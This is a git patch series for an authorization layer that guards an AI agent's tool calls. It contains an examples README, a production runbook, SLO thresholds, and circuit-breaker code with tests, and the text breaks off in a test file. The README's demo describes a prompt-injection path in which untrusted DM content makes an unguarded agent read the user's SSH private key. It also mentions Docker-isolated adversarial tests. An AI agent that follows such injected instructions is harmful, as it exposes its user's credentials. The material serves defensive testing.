From 698841fefbfc7393354ea261063ec4d9d935fe27 Mon Sep 17 00:00:00 2001 From: SentienceDEV Date: Fri, 20 Feb 2026 17:14:56 -0800 Subject: [PATCH 1/2] demo setup guide in examples/readme --- examples/HACK_VS_FIX_DEMO.md | 41 ------------ examples/README.md | 121 +++++++++++++++++++++++++++++++++++ 2 files changed, 121 insertions(+), 41 deletions(-) delete mode 100644 examples/HACK_VS_FIX_DEMO.md create mode 100644 examples/README.md diff --git a/examples/HACK_VS_FIX_DEMO.md b/examples/HACK_VS_FIX_DEMO.md deleted file mode 100644 index 2843c29..0000000 --- a/examples/HACK_VS_FIX_DEMO.md +++ /dev/null @@ -1,41 +0,0 @@ -# Hack vs Fix Demo Playbook - -This demo shows the OpenClaw prompt-injection risk path and the -`openclaw-predicate-provider` protection path. - -## Goal - -Demonstrate that: - -1. an unguarded tool call can read a sensitive file when prompted from an - untrusted source, and -2. the Predicate-guarded path blocks the same action with deterministic policy. - -## Fast local run - -From `openclaw-predicate-provider/`: - -```bash -npm test -- tests/hack-vs-fix-demo.test.ts -``` - -Expected: - -- test passes, -- unguarded branch returns sensitive payload string, -- guarded branch throws `ActionDeniedError` with deny reason - `deny_sensitive_read_from_untrusted_context`. - -## Scenario in plain language - -- **Hack path:** injected context (`source: untrusted_dm`) attempts - `fs.read` on `~/.ssh/id_rsa` and succeeds when unguarded. -- **Fix path:** same action goes through `GuardedProvider + ToolAdapter`, - maps to Predicate action/resource contract, and receives deny decision. - -## Video recording checklist (for launch asset) - -1. Show baseline unguarded action succeeds for sensitive read. -2. Show guarded provider enabled with identical prompt/context. -3. Show deny result and user-facing blocked message. -4. Show test command and green output as reproducible evidence. diff --git a/examples/README.md b/examples/README.md new file mode 100644 index 0000000..18aafe8 --- /dev/null +++ b/examples/README.md @@ -0,0 +1,121 @@ +# OpenClaw Predicate Provider Examples + +This directory contains examples and test harnesses for the OpenClaw Predicate Provider. + +## Hack vs Fix Demo + +This demo shows the OpenClaw prompt-injection risk path and the +`PredicateClaw` protection path. + +### Goal + +Demonstrate that: + +1. An unguarded tool call can read a sensitive file when prompted from an + untrusted source, and +2. The Predicate-guarded path blocks the same action with deterministic policy. + +### Scenario in Plain Language + +- **Hack path:** Injected context (`source: untrusted_dm`) attempts + `fs.read` on `~/.ssh/id_rsa` and succeeds when unguarded. +- **Fix path:** Same action goes through `GuardedProvider + ToolAdapter`, + maps to Predicate action/resource contract, and receives deny decision. + +### Fast Local Run + +From `PredicateClaw/`: + +```bash +npm test -- tests/hack-vs-fix-demo.test.ts +``` + +Expected: + +- Test passes +- Unguarded branch returns sensitive payload string +- Guarded branch throws `ActionDeniedError` with deny reason + `deny_sensitive_read_from_untrusted_context` + +## Docker Adversarial Testing + +### Why Docker? + +Running adversarial tests (simulating prompt injection attacks like "read my +SSH keys" or "curl malware") directly on your machine is risky. If the provider +has a bug, the attack could execute. Docker isolates failures to the container. + +### Quick Start + +From the `PredicateClaw/` directory: + +**Option 1: Docker Compose (recommended)** + +```bash +# Run the "Hack vs Fix" demo test +docker compose -f examples/docker/docker-compose.test.yml run --rm provider-demo + +# Run full CI checks (typecheck + all tests) +docker compose -f examples/docker/docker-compose.test.yml run --rm provider-ci +``` + +**Option 2: Build and run directly** + +```bash +# Build the test image +docker build -t openclaw-provider-test -f examples/docker/Dockerfile.test . + +# Run demo test +docker run --rm -it openclaw-provider-test npm run test:demo + +# Run full CI +docker run --rm -it openclaw-provider-test npm run test:ci +``` + +### Expected Output + +``` + RUN v4.x.x /app + + ✓ tests/hack-vs-fix-demo.test.ts (1 test) + ✓ shows unguarded exfil path and guarded deny path + + Test Files 1 passed (1) + Tests 1 passed (1) +``` + +The test verifies: + +- Unguarded call returns sensitive data +- Guarded call throws `ActionDeniedError` +- Deny reason is stable and auditable + +### Testing with a Live Sidecar + +To test against a real `predicate-authorityd` sidecar (not mocked): + +```bash +# Start sidecar on host +predicate-authorityd --port 9090 + +# Run container with host network access +docker run --rm -it --network=host openclaw-provider-test npm test +``` + +The `--network=host` lets the container reach `localhost:9090` where your +sidecar runs. + +## Video Recording Checklist (for Launch Asset) + +1. Show baseline unguarded action succeeds for sensitive read. +2. Show guarded provider enabled with identical prompt/context. +3. Show deny result and user-facing blocked message. +4. Show test command and green output as reproducible evidence. + +## Other Examples + +- `openclaw_integration_example.py` - Python integration example +- `runtime_registry_example.py` - Runtime registration example +- `openclaw-plugin-smoke/` - OpenClaw plugin smoke test +- `policy/` - Example policy files +- `docker/` - Docker test harness files From 5667cbd6b2f283ad099821b53bb554eb9b28d8f8 Mon Sep 17 00:00:00 2001 From: SentienceDEV Date: Fri, 20 Feb 2026 17:33:47 -0800 Subject: [PATCH 2/2] Phase 3: Hardening IdP alignment, and SLOs --- docs/OPERATIONAL_RUNBOOK.md | 389 ++++++++++++++++++++++++++++++++++ docs/SLO_THRESHOLDS.md | 193 +++++++++++++++++ src/circuit-breaker.ts | 245 +++++++++++++++++++++ src/index.ts | 1 + tests/circuit-breaker.test.ts | 266 +++++++++++++++++++++++ tests/jwks-rotation.test.ts | 274 ++++++++++++++++++++++++ tests/load-latency.test.ts | 214 +++++++++++++++++++ 7 files changed, 1582 insertions(+) create mode 100644 docs/OPERATIONAL_RUNBOOK.md create mode 100644 docs/SLO_THRESHOLDS.md create mode 100644 src/circuit-breaker.ts create mode 100644 tests/circuit-breaker.test.ts create mode 100644 tests/jwks-rotation.test.ts create mode 100644 tests/load-latency.test.ts diff --git a/docs/OPERATIONAL_RUNBOOK.md b/docs/OPERATIONAL_RUNBOOK.md new file mode 100644 index 0000000..3cf6fc2 --- /dev/null +++ b/docs/OPERATIONAL_RUNBOOK.md @@ -0,0 +1,389 @@ +# Operational Runbook + +This runbook provides step-by-step procedures for operating and troubleshooting +the OpenClaw Predicate Provider in production environments. + +## Quick Reference + +| Incident Type | Severity | First Response | +|---------------|----------|----------------| +| Circuit breaker open | P1 | Check sidecar health | +| Elevated deny rate | P2 | Compare to policy changes | +| High latency | P3 | Check sidecar resources | +| Audit export failures | P4 | Check control plane connectivity | + +## Prerequisites + +Before using this runbook, ensure you have: + +- Access to provider logs and metrics dashboards +- Access to sidecar logs (`predicate-authorityd`) +- Ability to restart provider/sidecar processes +- Contact information for on-call escalation + +## Incident Response Procedures + +### P1: Circuit Breaker Stuck Open + +**Symptoms:** +- All authorization requests failing immediately +- `CircuitOpenError` in provider logs +- Metrics showing `predicate_circuit_state = open` + +**Diagnosis Steps:** + +1. **Check sidecar health** + ```bash + curl -s http://localhost:8787/health | jq . + ``` + Expected: `{"status": "healthy"}` + +2. **Check sidecar logs for errors** + ```bash + journalctl -u predicate-authorityd -n 100 --no-pager + # or + docker logs predicate-authorityd --tail 100 + ``` + +3. **Verify network connectivity** + ```bash + curl -w "@curl-format.txt" -s -o /dev/null http://localhost:8787/health + ``` + +4. **Check control plane sync status** + ```bash + curl -s http://localhost:8787/v1/sync/status | jq . + ``` + +**Resolution Steps:** + +1. **If sidecar is unhealthy:** + ```bash + # Restart sidecar + systemctl restart predicate-authorityd + # or + docker restart predicate-authorityd + ``` + +2. **If sidecar is healthy but circuit is still open:** + - Circuit will auto-recover after `resetTimeoutMs` (default: 30s) + - For immediate recovery, restart the provider process + +3. **If control plane sync is failing:** + - Check control plane endpoint accessibility + - Verify API credentials are valid + - Check for control plane service incidents + +**Escalation:** +- If not resolved in 5 minutes, page on-call engineer +- If sidecar restart doesn't help, escalate to platform team + +--- + +### P2: Elevated Deny Rate + +**Symptoms:** +- Sudden increase in deny decisions (>2x baseline) +- User reports of blocked actions +- `denied_by_policy` reason code spike + +**Diagnosis Steps:** + +1. **Check deny rate trend** + ```bash + # Query recent deny events + curl -s "http://localhost:8787/v1/audit/decisions?outcome=deny&limit=50" | jq . + ``` + +2. **Compare to recent policy changes** + - Check control plane for recent policy deployments + - Review policy version in metrics + +3. **Identify affected actions/resources** + ```bash + # Group denials by action + curl -s "http://localhost:8787/v1/audit/decisions?outcome=deny" | \ + jq -r '.items | group_by(.action) | map({action: .[0].action, count: length})' + ``` + +4. **Check for attack patterns** + - Look for repeated denials from same principal + - Check for unusual resource patterns (path traversal, etc.) + +**Resolution Steps:** + +1. **If caused by policy change:** + - Rollback to previous policy version via control plane + - Or fix policy and redeploy + +2. **If attack attempt:** + - Document attack patterns + - Consider adding rate limiting + - Report to security team + +3. **If false positives:** + - Review policy rules for overly broad denials + - Add specific allow rules for legitimate use cases + +**Escalation:** +- If attack suspected, notify security team immediately +- If policy rollback needed, coordinate with policy owners + +--- + +### P3: High Authorization Latency + +**Symptoms:** +- p95 latency > 150ms +- Slow tool execution reported by users +- Timeout errors in logs + +**Diagnosis Steps:** + +1. **Check current latency percentiles** + ```bash + curl -s http://localhost:8787/metrics | grep predicate_auth_latency + ``` + +2. **Check sidecar resource usage** + ```bash + # CPU and memory + top -p $(pgrep predicate-authorityd) + # or + docker stats predicate-authorityd --no-stream + ``` + +3. **Check control plane sync load** + ```bash + curl -s http://localhost:8787/v1/sync/status | jq '.last_sync_duration_ms' + ``` + +4. **Check concurrent request volume** + ```bash + curl -s http://localhost:8787/metrics | grep predicate_auth_concurrent + ``` + +**Resolution Steps:** + +1. **If sidecar CPU is high:** + - Check for runaway policy evaluation + - Consider scaling sidecar resources + - Review policy complexity + +2. **If sync is slow:** + - Check control plane latency + - Consider increasing sync interval + - Review policy size + +3. **If high concurrent load:** + - Consider horizontal scaling + - Review request batching options + - Check for retry storms + +**Escalation:** +- If resources are maxed, request capacity increase +- If policy is too complex, work with policy team to optimize + +--- + +### P4: Audit Export Failures + +**Symptoms:** +- Missing audit events in control plane +- `audit_export_failure` in logs +- Non-zero `predicate_audit_failures` counter + +**Diagnosis Steps:** + +1. **Check export error logs** + ```bash + grep "audit.*error" /var/log/provider.log | tail -20 + ``` + +2. **Verify control plane connectivity** + ```bash + curl -s https://control-plane.example.com/health + ``` + +3. **Check export queue depth** + ```bash + curl -s http://localhost:8787/metrics | grep predicate_audit_queue + ``` + +**Resolution Steps:** + +1. **If control plane unreachable:** + - Check network/firewall rules + - Verify TLS certificates + - Check for control plane incidents + +2. **If queue is backed up:** + - Audit export is best-effort; auth continues working + - Events will retry automatically + - Check disk space for local buffer + +3. **If credentials expired:** + - Rotate API credentials + - Update provider configuration + - Restart provider + +**Escalation:** +- Audit failures are P4 (non-blocking) +- Escalate only if prolonged (>1 hour) or compliance-critical + +--- + +## Routine Operations + +### Restarting the Provider + +```bash +# Graceful restart (allows in-flight requests to complete) +systemctl reload openclaw-provider + +# Full restart +systemctl restart openclaw-provider +``` + +### Rotating Credentials + +1. Generate new credentials in control plane +2. Update provider configuration +3. Restart provider +4. Verify connectivity +5. Revoke old credentials + +### Updating Policy + +1. Deploy new policy to control plane +2. Monitor sync status on sidecars +3. Watch deny rate for anomalies +4. Rollback if issues detected + +### Scaling Sidecars + +For high-load environments: + +1. Deploy additional sidecar instances +2. Configure load balancer +3. Update provider `baseUrl` to load balancer +4. Verify even distribution + +--- + +## Health Checks + +### Provider Health + +```bash +# Local provider health +curl -s http://localhost:3000/health + +# Expected response +{ + "status": "healthy", + "sidecar": "connected", + "circuit": "closed" +} +``` + +### Sidecar Health + +```bash +# Sidecar health +curl -s http://localhost:8787/health + +# Expected response +{ + "status": "healthy", + "policy_version": "v1.2.3", + "last_sync": "2026-02-20T12:00:00Z" +} +``` + +### End-to-End Check + +```bash +# Test authorization flow +curl -X POST http://localhost:8787/v1/authorize \ + -H "Content-Type: application/json" \ + -d '{ + "principal": "test:health-check", + "action": "health.check", + "resource": "system" + }' + +# Expected: allow decision for health check action +``` + +--- + +## Monitoring Checklist + +### Daily + +- [ ] Review deny rate trends +- [ ] Check circuit breaker state +- [ ] Verify audit export completeness + +### Weekly + +- [ ] Review latency percentiles +- [ ] Check policy sync freshness +- [ ] Audit access logs + +### Monthly + +- [ ] Review and update SLO thresholds +- [ ] Test incident response procedures +- [ ] Update runbook with learnings + +--- + +## Contact Information + +| Role | Contact | +|------|---------| +| On-call engineer | PagerDuty: `predicate-oncall` | +| Platform team | Slack: `#predicate-platform` | +| Security team | Slack: `#security-incidents` | +| Control plane status | https://status.predicatesystems.ai | + +--- + +## Appendix + +### Useful Commands + +```bash +# View real-time logs +journalctl -u predicate-authorityd -f + +# Check process status +systemctl status predicate-authorityd + +# View metrics +curl -s http://localhost:8787/metrics + +# Force policy sync +curl -X POST http://localhost:8787/v1/sync/trigger + +# Get current policy version +curl -s http://localhost:8787/v1/policy/version +``` + +### Log Locations + +| Component | Log Path | +|-----------|----------| +| Provider | `/var/log/openclaw-provider/provider.log` | +| Sidecar | `/var/log/predicate-authorityd/sidecar.log` | +| Audit events | `/var/log/predicate-authorityd/audit.jsonl` | + +### Configuration Files + +| Component | Config Path | +|-----------|-------------| +| Provider | `/etc/openclaw-provider/config.yaml` | +| Sidecar | `/etc/predicate-authorityd/config.yaml` | +| Policy | Managed via control plane | diff --git a/docs/SLO_THRESHOLDS.md b/docs/SLO_THRESHOLDS.md new file mode 100644 index 0000000..a3f48f9 --- /dev/null +++ b/docs/SLO_THRESHOLDS.md @@ -0,0 +1,193 @@ +# SLOs and Alert Thresholds + +This document defines Service Level Objectives (SLOs) and alert thresholds for +the OpenClaw Predicate Provider in production deployments. + +## Latency SLOs + +### Authorization Call Latency + +| Percentile | Target | Alert Threshold | +|------------|--------|-----------------| +| p50 | < 25 ms | > 50 ms | +| p95 | < 75 ms | > 150 ms | +| p99 | < 150 ms | > 300 ms | + +These targets assume local sidecar deployment. For remote sidecar deployments, +add network RTT to each target. + +### Sidecar Timeout + +- **Default timeout:** 300 ms +- **Hard timeout (fail-closed):** 500 ms + +If the sidecar does not respond within the timeout, the provider fails closed +(denies the action) for high-risk operations. + +## Availability SLOs + +### Provider Availability + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Uptime | 99.9% | < 99.5% | +| Error rate | < 0.1% | > 1% | + +### Sidecar Availability + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Uptime | 99.95% | < 99.9% | +| Circuit breaker open rate | < 0.5% | > 2% | + +## Decision Quality SLOs + +### Deny Spike Detection + +| Metric | Baseline | Alert Threshold | +|--------|----------|-----------------| +| Deny rate | ~5% (varies by policy) | > 2x baseline over 5 min | +| Deny rate spike | N/A | > 50% increase in 1 min | + +A sudden spike in deny rates may indicate: +- Misconfigured policy rollout +- Attack attempt (should trigger investigation) +- Sidecar sync failure + +### Reason Code Distribution + +Monitor reason code distribution for anomalies: + +| Reason Code | Expected Range | Alert if | +|-------------|----------------|----------| +| `denied_by_policy` | 80-95% of denials | < 70% | +| `sidecar_timeout` | < 1% | > 5% | +| `circuit_open` | < 0.5% | > 2% | +| `missing_context` | < 0.1% | > 1% | + +## Circuit Breaker Thresholds + +### Default Configuration + +```typescript +{ + failureThreshold: 5, // Opens after 5 consecutive failures + resetTimeoutMs: 30_000, // Attempts recovery after 30 seconds + successThreshold: 2, // Closes after 2 successful calls in half-open +} +``` + +### Alert Thresholds + +| Event | Alert Level | Action | +|-------|-------------|--------| +| Circuit opened | Warning | Investigate sidecar health | +| Circuit open > 1 min | Critical | Page on-call | +| Circuit open > 5 min | Critical | Consider manual intervention | + +## Telemetry and Audit SLOs + +### Audit Export Latency + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Export delay (best-effort) | < 5 seconds | > 30 seconds | +| Export failure rate | < 1% | > 5% | + +Note: Audit export is best-effort and should never block the authorization path. + +### Telemetry Completeness + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Decision events captured | > 99.9% | < 99% | +| Context fields present | > 99% | < 95% | + +## Control Plane Sync SLOs + +### Policy Sync + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Sync interval | < 60 seconds | > 5 minutes | +| Stale policy age | < 5 minutes | > 15 minutes | + +### Revocation Propagation + +| Metric | Target | Alert Threshold | +|--------|--------|-----------------| +| Revocation latency | < 30 seconds | > 2 minutes | +| Revocation completeness | 100% | Any missed revocation | + +## Monitoring Implementation + +### Required Metrics + +```typescript +// Authorization metrics +counter("predicate_auth_total", { outcome: "allow" | "deny" | "error" }); +histogram("predicate_auth_latency_ms", { action: string }); + +// Circuit breaker metrics +gauge("predicate_circuit_state", { state: "closed" | "open" | "half_open" }); +counter("predicate_circuit_transitions", { from: string, to: string }); + +// Sync metrics +gauge("predicate_policy_age_seconds"); +counter("predicate_sync_failures"); + +// Audit metrics +counter("predicate_audit_exports", { status: "success" | "failure" }); +histogram("predicate_audit_latency_ms"); +``` + +### Dashboard Panels + +1. **Authorization Overview** + - Request rate by action + - Allow/deny/error distribution + - p50/p95/p99 latency + +2. **Circuit Breaker Status** + - Current state per sidecar + - Transition history + - Recovery time + +3. **Sync Health** + - Policy version timeline + - Sync lag + - Revocation propagation + +4. **Deny Analysis** + - Deny rate over time + - Top deny reasons + - Deny by tenant/action + +## Incident Response + +### P1: Circuit Breaker Stuck Open + +1. Check sidecar health and logs +2. Verify network connectivity +3. Check control plane status +4. Consider manual circuit reset if sidecar is healthy + +### P2: Elevated Deny Rate + +1. Compare to policy change timeline +2. Check for attack patterns +3. Review deny reasons distribution +4. Validate policy sync status + +### P3: Elevated Latency + +1. Check sidecar resource usage +2. Review concurrent request load +3. Check control plane sync load +4. Consider scaling sidecars + +## Review Cadence + +- **Weekly:** Review latency percentiles and deny trends +- **Monthly:** Audit SLO compliance and adjust thresholds +- **Quarterly:** Review and update SLO targets based on operational learnings diff --git a/src/circuit-breaker.ts b/src/circuit-breaker.ts new file mode 100644 index 0000000..92e5d5a --- /dev/null +++ b/src/circuit-breaker.ts @@ -0,0 +1,245 @@ +/** + * Circuit breaker for sidecar outage resilience. + * + * States: + * - CLOSED: Normal operation, requests pass through + * - OPEN: Too many failures, requests fail fast without calling sidecar + * - HALF_OPEN: Testing if sidecar has recovered + */ + +export type CircuitState = "closed" | "open" | "half_open"; + +export interface CircuitBreakerConfig { + /** Number of failures before opening the circuit */ + failureThreshold: number; + /** Time in ms before attempting recovery (half-open state) */ + resetTimeoutMs: number; + /** Number of successful calls in half-open to close circuit */ + successThreshold: number; + /** Optional callback when state changes */ + onStateChange?: (from: CircuitState, to: CircuitState) => void; +} + +export const defaultCircuitBreakerConfig: CircuitBreakerConfig = { + failureThreshold: 5, + resetTimeoutMs: 30_000, + successThreshold: 2, +}; + +export interface CircuitBreakerMetrics { + state: CircuitState; + failureCount: number; + successCount: number; + lastFailureTime: number | null; + totalFailures: number; + totalSuccesses: number; + totalRejections: number; +} + +export class CircuitBreaker { + private state: CircuitState = "closed"; + private failureCount = 0; + private successCount = 0; + private lastFailureTime: number | null = null; + private totalFailures = 0; + private totalSuccesses = 0; + private totalRejections = 0; + + constructor(private readonly config: CircuitBreakerConfig) {} + + getMetrics(): CircuitBreakerMetrics { + return { + state: this.state, + failureCount: this.failureCount, + successCount: this.successCount, + lastFailureTime: this.lastFailureTime, + totalFailures: this.totalFailures, + totalSuccesses: this.totalSuccesses, + totalRejections: this.totalRejections, + }; + } + + getState(): CircuitState { + return this.state; + } + + /** + * Check if request should be allowed through. + * Returns true if allowed, false if circuit is open. + */ + allowRequest(): boolean { + if (this.state === "closed") { + return true; + } + + if (this.state === "open") { + const now = Date.now(); + if ( + this.lastFailureTime !== null && + now - this.lastFailureTime >= this.config.resetTimeoutMs + ) { + this.transitionTo("half_open"); + return true; + } + this.totalRejections++; + return false; + } + + // half_open: allow limited requests to test recovery + return true; + } + + /** + * Record a successful call. + */ + recordSuccess(): void { + this.totalSuccesses++; + + if (this.state === "half_open") { + this.successCount++; + if (this.successCount >= this.config.successThreshold) { + this.transitionTo("closed"); + } + } else if (this.state === "closed") { + // Reset failure count on success + this.failureCount = 0; + } + } + + /** + * Record a failed call. + */ + recordFailure(): void { + this.totalFailures++; + this.lastFailureTime = Date.now(); + + if (this.state === "half_open") { + // Any failure in half-open reopens the circuit + this.transitionTo("open"); + return; + } + + if (this.state === "closed") { + this.failureCount++; + if (this.failureCount >= this.config.failureThreshold) { + this.transitionTo("open"); + } + } + } + + /** + * Force reset to closed state (e.g., for testing or manual recovery). + */ + reset(): void { + this.transitionTo("closed"); + } + + private transitionTo(newState: CircuitState): void { + if (this.state === newState) return; + + const oldState = this.state; + this.state = newState; + + // Reset counters on state change + if (newState === "closed") { + this.failureCount = 0; + this.successCount = 0; + } else if (newState === "half_open") { + this.successCount = 0; + } else if (newState === "open") { + this.successCount = 0; + } + + this.config.onStateChange?.(oldState, newState); + } +} + +/** + * Exponential backoff calculator with jitter. + */ +export interface BackoffConfig { + initialMs: number; + maxMs: number; + multiplier: number; + jitterFactor: number; +} + +export const defaultBackoffConfig: BackoffConfig = { + initialMs: 100, + maxMs: 10_000, + multiplier: 2, + jitterFactor: 0.1, +}; + +export function calculateBackoff( + attempt: number, + config: BackoffConfig = defaultBackoffConfig, +): number { + const base = Math.min( + config.initialMs * Math.pow(config.multiplier, attempt), + config.maxMs, + ); + const jitter = base * config.jitterFactor * (Math.random() * 2 - 1); + return Math.max(0, Math.round(base + jitter)); +} + +/** + * Sleep for a given number of milliseconds. + */ +export function sleep(ms: number): Promise { + return new Promise((resolve) => setTimeout(resolve, ms)); +} + +/** + * Wrap an async function with circuit breaker and retry logic. + */ +export async function withCircuitBreaker( + breaker: CircuitBreaker, + fn: () => Promise, + options?: { + maxRetries?: number; + backoffConfig?: BackoffConfig; + isFailure?: (error: unknown) => boolean; + }, +): Promise { + const maxRetries = options?.maxRetries ?? 0; + const backoffConfig = options?.backoffConfig ?? defaultBackoffConfig; + const isFailure = options?.isFailure ?? (() => true); + + if (!breaker.allowRequest()) { + throw new CircuitOpenError("Circuit breaker is open"); + } + + let lastError: unknown; + + for (let attempt = 0; attempt <= maxRetries; attempt++) { + try { + const result = await fn(); + breaker.recordSuccess(); + return result; + } catch (error) { + lastError = error; + + if (!isFailure(error)) { + // Not a circuit-breaker-relevant failure (e.g., business logic error) + throw error; + } + + breaker.recordFailure(); + + if (attempt < maxRetries && breaker.allowRequest()) { + const delay = calculateBackoff(attempt, backoffConfig); + await sleep(delay); + } + } + } + + throw lastError; +} + +export class CircuitOpenError extends Error { + constructor(message: string) { + super(message); + this.name = "CircuitOpenError"; + } +} diff --git a/src/index.ts b/src/index.ts index 4934646..12453dd 100644 --- a/src/index.ts +++ b/src/index.ts @@ -1,5 +1,6 @@ export * from "./adapter.js"; export * from "./authority-client.js"; +export * from "./circuit-breaker.js"; export * from "./config.js"; export * from "./control-plane-sync.js"; export * from "./errors.js"; diff --git a/tests/circuit-breaker.test.ts b/tests/circuit-breaker.test.ts new file mode 100644 index 0000000..b4fe59a --- /dev/null +++ b/tests/circuit-breaker.test.ts @@ -0,0 +1,266 @@ +import { describe, expect, it, vi } from "vitest"; +import { + calculateBackoff, + CircuitBreaker, + CircuitOpenError, + defaultBackoffConfig, + defaultCircuitBreakerConfig, + withCircuitBreaker, + type CircuitState, +} from "../src/circuit-breaker.js"; + +describe("CircuitBreaker", () => { + it("starts in closed state", () => { + const breaker = new CircuitBreaker(defaultCircuitBreakerConfig); + expect(breaker.getState()).toBe("closed"); + expect(breaker.allowRequest()).toBe(true); + }); + + it("opens after reaching failure threshold", () => { + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 3, + }); + + breaker.recordFailure(); + expect(breaker.getState()).toBe("closed"); + + breaker.recordFailure(); + expect(breaker.getState()).toBe("closed"); + + breaker.recordFailure(); + expect(breaker.getState()).toBe("open"); + expect(breaker.allowRequest()).toBe(false); + }); + + it("transitions to half-open after reset timeout", async () => { + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 1, + resetTimeoutMs: 50, + }); + + breaker.recordFailure(); + expect(breaker.getState()).toBe("open"); + expect(breaker.allowRequest()).toBe(false); + + // Wait for reset timeout + await new Promise((r) => setTimeout(r, 60)); + + expect(breaker.allowRequest()).toBe(true); + expect(breaker.getState()).toBe("half_open"); + }); + + it("closes after success threshold in half-open", async () => { + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 1, + resetTimeoutMs: 10, + successThreshold: 2, + }); + + breaker.recordFailure(); + expect(breaker.getState()).toBe("open"); + + await new Promise((r) => setTimeout(r, 15)); + breaker.allowRequest(); // Triggers half-open + + expect(breaker.getState()).toBe("half_open"); + + breaker.recordSuccess(); + expect(breaker.getState()).toBe("half_open"); + + breaker.recordSuccess(); + expect(breaker.getState()).toBe("closed"); + }); + + it("reopens on failure in half-open state", async () => { + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 1, + resetTimeoutMs: 10, + }); + + breaker.recordFailure(); + await new Promise((r) => setTimeout(r, 15)); + breaker.allowRequest(); + + expect(breaker.getState()).toBe("half_open"); + + breaker.recordFailure(); + expect(breaker.getState()).toBe("open"); + }); + + it("resets failure count on success in closed state", () => { + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 3, + }); + + breaker.recordFailure(); + breaker.recordFailure(); + breaker.recordSuccess(); + breaker.recordFailure(); + breaker.recordFailure(); + + // Should still be closed because success reset the count + expect(breaker.getState()).toBe("closed"); + }); + + it("tracks metrics correctly", () => { + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 2, + }); + + breaker.recordSuccess(); + breaker.recordSuccess(); + breaker.recordFailure(); + breaker.recordFailure(); + breaker.allowRequest(); // Should be rejected + + const metrics = breaker.getMetrics(); + expect(metrics.totalSuccesses).toBe(2); + expect(metrics.totalFailures).toBe(2); + expect(metrics.totalRejections).toBe(1); + expect(metrics.state).toBe("open"); + }); + + it("calls onStateChange callback", () => { + const stateChanges: Array<{ from: CircuitState; to: CircuitState }> = []; + + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 1, + onStateChange: (from, to) => stateChanges.push({ from, to }), + }); + + breaker.recordFailure(); + expect(stateChanges).toHaveLength(1); + expect(stateChanges[0]).toEqual({ from: "closed", to: "open" }); + }); + + it("can be manually reset", () => { + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 1, + }); + + breaker.recordFailure(); + expect(breaker.getState()).toBe("open"); + + breaker.reset(); + expect(breaker.getState()).toBe("closed"); + expect(breaker.allowRequest()).toBe(true); + }); +}); + +describe("calculateBackoff", () => { + it("calculates exponential backoff", () => { + const config = { ...defaultBackoffConfig, jitterFactor: 0 }; + + expect(calculateBackoff(0, config)).toBe(100); + expect(calculateBackoff(1, config)).toBe(200); + expect(calculateBackoff(2, config)).toBe(400); + expect(calculateBackoff(3, config)).toBe(800); + }); + + it("respects max backoff", () => { + const config = { ...defaultBackoffConfig, jitterFactor: 0, maxMs: 500 }; + + expect(calculateBackoff(0, config)).toBe(100); + expect(calculateBackoff(1, config)).toBe(200); + expect(calculateBackoff(2, config)).toBe(400); + expect(calculateBackoff(3, config)).toBe(500); // Capped at max + expect(calculateBackoff(10, config)).toBe(500); + }); + + it("adds jitter within bounds", () => { + const config = { ...defaultBackoffConfig, jitterFactor: 0.5 }; + const results = new Set(); + + for (let i = 0; i < 20; i++) { + results.add(calculateBackoff(0, config)); + } + + // With jitter, we should get varied results + expect(results.size).toBeGreaterThan(1); + + // All results should be within expected range (100 +/- 50) + for (const result of results) { + expect(result).toBeGreaterThanOrEqual(50); + expect(result).toBeLessThanOrEqual(150); + } + }); +}); + +describe("withCircuitBreaker", () => { + it("executes function and records success", async () => { + const breaker = new CircuitBreaker(defaultCircuitBreakerConfig); + const fn = vi.fn().mockResolvedValue("result"); + + const result = await withCircuitBreaker(breaker, fn); + + expect(result).toBe("result"); + expect(fn).toHaveBeenCalledTimes(1); + expect(breaker.getMetrics().totalSuccesses).toBe(1); + }); + + it("throws CircuitOpenError when circuit is open", async () => { + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 1, + }); + + breaker.recordFailure(); + expect(breaker.getState()).toBe("open"); + + const fn = vi.fn().mockResolvedValue("result"); + + await expect(withCircuitBreaker(breaker, fn)).rejects.toThrow( + CircuitOpenError, + ); + expect(fn).not.toHaveBeenCalled(); + }); + + it("retries with backoff on failure", async () => { + const breaker = new CircuitBreaker({ + ...defaultCircuitBreakerConfig, + failureThreshold: 10, + }); + + let attempts = 0; + const fn = vi.fn().mockImplementation(() => { + attempts++; + if (attempts < 3) { + return Promise.reject(new Error("fail")); + } + return Promise.resolve("success"); + }); + + const result = await withCircuitBreaker(breaker, fn, { + maxRetries: 3, + backoffConfig: { ...defaultBackoffConfig, initialMs: 10, jitterFactor: 0 }, + }); + + expect(result).toBe("success"); + expect(fn).toHaveBeenCalledTimes(3); + }); + + it("respects isFailure predicate", async () => { + const breaker = new CircuitBreaker(defaultCircuitBreakerConfig); + + const businessError = new Error("business_error"); + const fn = vi.fn().mockRejectedValue(businessError); + + // Business errors should not trigger circuit breaker + await expect( + withCircuitBreaker(breaker, fn, { + isFailure: (e) => !(e instanceof Error && e.message === "business_error"), + }), + ).rejects.toThrow("business_error"); + + // No failures recorded + expect(breaker.getMetrics().totalFailures).toBe(0); + }); +}); diff --git a/tests/jwks-rotation.test.ts b/tests/jwks-rotation.test.ts new file mode 100644 index 0000000..acfe2ff --- /dev/null +++ b/tests/jwks-rotation.test.ts @@ -0,0 +1,274 @@ +import { describe, expect, it, vi } from "vitest"; +import type { AuthorizationRequest } from "@predicatesystems/authority"; +import { GuardedProvider } from "../src/provider.js"; + +/** + * Integration tests for JWKS/key-rotation-driven policy contexts. + * + * These tests verify that the provider correctly handles scenarios where + * policy decisions depend on JWT validation contexts that may change + * during key rotation events. + * + * Note: The provider passes context fields to the sidecar, which handles + * actual JWKS validation. These tests 